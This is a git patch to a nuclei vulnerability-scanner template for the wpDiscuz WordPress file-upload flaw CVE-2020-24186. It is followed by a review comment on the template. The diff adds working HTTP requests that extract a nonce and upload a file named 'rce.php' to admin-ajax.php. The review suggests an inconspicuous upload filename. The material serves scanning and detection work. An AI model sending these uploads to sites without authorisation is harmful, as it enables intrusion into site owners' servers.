From 83fd749b4eeacab5523f3d1e42706ea5c853694e Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 14 Mar 2021 19:47:36 +0530
Subject: [PATCH] template update

---
 cves/2020/CVE-2020-24186.yaml | 87 ++++++++++++++++++++++++-----------
 1 file changed, 61 insertions(+), 26 deletions(-)

diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index bf916c400a..1da1e88e32 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -1,54 +1,89 @@ id: CVE-2020-24186 info: - name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE author: Ganofins severity: high description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - tags: cve,cve2020,wordpress,wp-plugin + tags: cve,cve2020,wordpress,wp-plugin,rce requests: - raw: - | - POST /wp-admin/admin-ajax.php HTTP/1.1 + GET /?p=1 HTTP/1.1 Host: {{Hostname}} - Content-Length: 774 Accept: */* - X-Requested-With: XMLHttpRequest - User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Cookie: Connection: close - ------WebKitFormBoundaryUGWBOKSwsalnzhha + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 745 + Accept: */* + X-Requested-With: XMLHttpRequest + sec-ch-ua-mobile: ?0 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: cors + Sec-Fetch-Dest: empty + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" - + wmuUploadFiles - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_nonce" - - aede3ab0b2 - ------WebKitFormBoundaryUGWBOKSwsalnzhha + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak 
Content-Disposition: form-data; name="wmuAttachmentsData" - + undefined - ------WebKitFormBoundaryUGWBOKSwsalnzhha - Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php" - Content-Type: image/jpeg - - ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC��� - �� + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - 393 - ------WebKitFormBoundaryUGWBOKSwsalnzhha-- + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and matchers: - type: status status: - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body
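Review bot: The second raw request uploads a file as `wmu_files[0]` with `filename="rce.php"` and nothing removes it afterwards, so every successful scan leaves a `.php`-suffixed artifact in the target's upload directory, with the `"url"` extractor as the operator's only handle for cleanup. The template should declare that it is an active exploit rather than a passive check: extend the tag list to `tags: cve,cve2020,wordpress,wp-plugin,rce,intrusive` (or whatever marker this corpus uses for templates that write to targets) and put a comment above the POST such as `# NOTE: writes a .php file to the target's upload dir; the "url" extractor reports its location for removal`. The base64 payload decodes to JPEG/EXIF magic bytes rather than PHP code, so the artifact is not itself a shell, but a predictably named `rce.php` on a public path is still a finding in its own right and a random, inconspicuous filename would be preferable. The hard-coded `Content-Length: 745` is only correct if the nonce substituted for `{{wmuSecurity}}` keeps the body at exactly that length; unless nuclei recomputes the header for raw requests, it should be dropped and left to the client. Separately, the `"url"` regex `[a-z:\\/0-9-.]+` will not match hosts or paths containing uppercase letters or `_`, so the extractor can silently yield nothing on such targets.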